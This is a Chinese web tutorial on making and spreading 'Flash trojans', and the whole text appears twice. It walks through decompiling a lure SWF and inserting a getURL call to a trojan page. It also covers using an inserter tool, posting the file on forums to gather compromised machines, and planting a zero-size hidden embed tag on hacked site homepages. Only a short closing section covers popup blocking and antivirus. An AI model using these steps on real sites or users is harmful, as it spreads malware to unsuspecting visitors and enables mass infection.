flash木马制作及防御
来源:教程360
木马(Trojan),您一定不再陌生,当网络安全、信息安全越来越受到人们重视时,木马(Trojan)并没有削弱对网民伤害,甚至出现了越演越烈的趋势,专家甚至指出我过已经进入了木马(Trojan)时代。编者将给用户呈现flash木马(Trojan)的制作过程,让您对木马(Trojan)有一个更深刻的理解。
一、制作flash动画木马的准备
flash动画木马的原理,是在网页中显示或本地直接播放flash动画木马时,让flash自动打开一个网址,而该网址就是我们预先制作好的一个木马网页。也就是说,在制作网页木马前,我们首先需要制作好一个网页木马,并将它放置到某个网站上去。
另外,我们还需要准备一个比较吸引人的flash动画文件“mm热舞.swf”,以及flash动画反编译工具“闪客精灵”,编辑工具macromedia flash mx。
二、最原始的flash木马
现在虽然有了许多各种各样的flash动画木马制作工具,但是为了了解flash动画木马的最基本原理,有必要从头开始用最原始的方法制作一个flash木马。
步骤一:反编译swf动画
首先我们需要将要插入网页木马的flash动画文件“mm热舞.swf”,反编译成可编辑的.fla格式。运行“闪客精灵”,点击菜单“文件” →“快速打开”命令,指定“mm热舞.swf”文件将其导入。然后点击工具栏上的“导出fla”命令,将动画导出为“mm热舞.fla”文件。
步骤二:插入网页木马代码
然后运行flash动画编辑器macromedia flash mx,点击菜单“文件”→“打开”,调入刚才保存的fla文件。展开界面下方的“动作/帧”栏,再展开“动作”→“浏览器/网络”项,点击其中的 “geturl”命令,在右边窗口中的“url”里面输入我们的网页木马地址;窗口方式为“_blank”;“变量”设置为“使用get方式发送”,在下方的代码窗口中将出现“geturl("http://网页木马地址", "_blank", "get");”。
步骤三:生成flash木马
设置完毕后保存文件,并点击菜单“文件”→“发布”命令,将动画重新导出为swf格式。用ie浏览器打开刚才生成的flash动画木马,可以看到随着flash动画打开播放时,自动弹出一个浏览器窗口,里面将会显示我们的木马网页。$page_devide$
三、简简单单生成flash木马
上面插入木马的过程比较麻烦,下面我们介绍一个简单的方法,也正是这些简单的工具使得flash木马在网上随处可见。
运行swf木马插入器,点击界面中的“选择”按钮,浏览指定要插入木马的swf文件;在“插入代码”中输入木马网页的地址;切记不要勾选下面的 “只解压”项。设置完毕后,点击“给我插”按钮,程序提示开始插入木马网页。显示成功信息后,关闭程序,用ie打开生成的动画,可以看到自动跳转到木马网页去了。
四、flash木马的利用
看到上面的步骤了吧,生成一个flash动画木马是不是很简单?那么生成的flash木马该如何应用呢?只要我们将flash上传到某个网站中,就可以通过论坛或网站之类的直接利用了。
大部分的论坛中都可以发来flash动画的帖子,利用论坛发帖,攻击者可以快速获得大量的肉鸡。以phpwind v4.3.2 论坛为例,在发帖或回复时,点击编辑窗口上方的“插入flash动画”按钮,设置flash窗口大小,使用默认设置后,要求输入flash的url地址。确定后,可以看到编辑窗口中显示的代码为““(flash=400,300)hxxp: //www.flash**.com.cn/upfiles/20067**.swf(/flash)””,这就是完整的flash播放代码了,不同的论坛代码是不一样的。
应用二:网页嵌入flash木马
攻击者入侵了某个大的网站之后,很可能在网站首页挂马,使用普通方式挂马会被管理员发觉,但是挂上flash木马的话,是很难查杀的。攻击者可能在网页中插入如下代码:
“《embed src=http://网页木马地址/木马.swf width=0 height=0 type=application/x-shockwave-flash autostart="false" showstatusbar="false"》”,其中的《》改为<>。
这里的参数“width=0 height=0”表示,flash播放窗口为零,也就是不显示flash播放窗口。其它用户浏览网页时,就会莫名其妙的弹出一个木马网页窗口。
五、关于flash木马的防范
其实不管flash木马有多么的巧妙,最终都是要跳转到木马网页去的,也就是说我们最终要防范的还是网页木马。了解了思路,对于flash动画木马就简单了:
首先,要开启windows xp sp2的窗口拦截窗口功能,或安装其它防弹出窗口的插件。如果那个漏网之鱼,莫名其妙弹出的网页窗口要及时的关闭。另外,一定要在上网浏览时开启杀毒软件的网页监控功能,只要网页木马在后台一下载到本地硬盘,就会被杀毒软件查杀,这样就万事无忧了
一、制作flash动画木马的准备
flash动画木马的原理,是在网页中显示或本地直接播放flash动画木马时,让flash自动打开一个网址,而该网址就是我们预先制作好的一个木马网页。也就是说,在制作网页木马前,我们首先需要制作好一个网页木马,并将它放置到某个网站上去。
另外,我们还需要准备一个比较吸引人的flash动画文件“mm热舞.swf”,以及flash动画反编译工具“闪客精灵”,编辑工具macromedia flash mx。
二、最原始的flash木马
现在虽然有了许多各种各样的flash动画木马制作工具,但是为了了解flash动画木马的最基本原理,有必要从头开始用最原始的方法制作一个flash木马。
步骤一:反编译swf动画
首先我们需要将要插入网页木马的flash动画文件“mm热舞.swf”,反编译成可编辑的.fla格式。运行“闪客精灵”,点击菜单“文件” →“快速打开”命令,指定“mm热舞.swf”文件将其导入。然后点击工具栏上的“导出fla”命令,将动画导出为“mm热舞.fla”文件。
步骤二:插入网页木马代码
然后运行flash动画编辑器macromedia flash mx,点击菜单“文件”→“打开”,调入刚才保存的fla文件。展开界面下方的“动作/帧”栏,再展开“动作”→“浏览器/网络”项,点击其中的 “geturl”命令,在右边窗口中的“url”里面输入我们的网页木马地址;窗口方式为“_blank”;“变量”设置为“使用get方式发送”,在下方的代码窗口中将出现“geturl("http://网页木马地址", "_blank", "get");”。
步骤三:生成flash木马
设置完毕后保存文件,并点击菜单“文件”→“发布”命令,将动画重新导出为swf格式。用ie浏览器打开刚才生成的flash动画木马,可以看到随着flash动画打开播放时,自动弹出一个浏览器窗口,里面将会显示我们的木马网页。$page_devide$
三、简简单单生成flash木马
上面插入木马的过程比较麻烦,下面我们介绍一个简单的方法,也正是这些简单的工具使得flash木马在网上随处可见。
运行swf木马插入器,点击界面中的“选择”按钮,浏览指定要插入木马的swf文件;在“插入代码”中输入木马网页的地址;切记不要勾选下面的 “只解压”项。设置完毕后,点击“给我插”按钮,程序提示开始插入木马网页。显示成功信息后,关闭程序,用ie打开生成的动画,可以看到自动跳转到木马网页去了。
四、flash木马的利用
看到上面的步骤了吧,生成一个flash动画木马是不是很简单?那么生成的flash木马该如何应用呢?只要我们将flash上传到某个网站中,就可以通过论坛或网站之类的直接利用了。
大部分的论坛中都可以发来flash动画的帖子,利用论坛发帖,攻击者可以快速获得大量的肉鸡。以phpwind v4.3.2 论坛为例,在发帖或回复时,点击编辑窗口上方的“插入flash动画”按钮,设置flash窗口大小,使用默认设置后,要求输入flash的url地址。确定后,可以看到编辑窗口中显示的代码为““(flash=400,300)hxxp: //www.flash**.com.cn/upfiles/20067**.swf(/flash)””,这就是完整的flash播放代码了,不同的论坛代码是不一样的。
应用二:网页嵌入flash木马
攻击者入侵了某个大的网站之后,很可能在网站首页挂马,使用普通方式挂马会被管理员发觉,但是挂上flash木马的话,是很难查杀的。攻击者可能在网页中插入如下代码:
“《embed src=http://网页木马地址/木马.swf width=0 height=0 type=application/x-shockwave-flash autostart="false" showstatusbar="false"》”,其中的《》改为<>。
这里的参数“width=0 height=0”表示,flash播放窗口为零,也就是不显示flash播放窗口。其它用户浏览网页时,就会莫名其妙的弹出一个木马网页窗口。
五、关于flash木马的防范
其实不管flash木马有多么的巧妙,最终都是要跳转到木马网页去的,也就是说我们最终要防范的还是网页木马。了解了思路,对于flash动画木马就简单了:
首先,要开启windows xp sp2的窗口拦截窗口功能,或安装其它防弹出窗口的插件。如果那个漏网之鱼,莫名其妙弹出的网页窗口要及时的关闭。另外,一定要在上网浏览时开启杀毒软件的网页监控功能,只要网页木马在后台一下载到本地硬盘,就会被杀毒软件查杀,这样就万事无忧了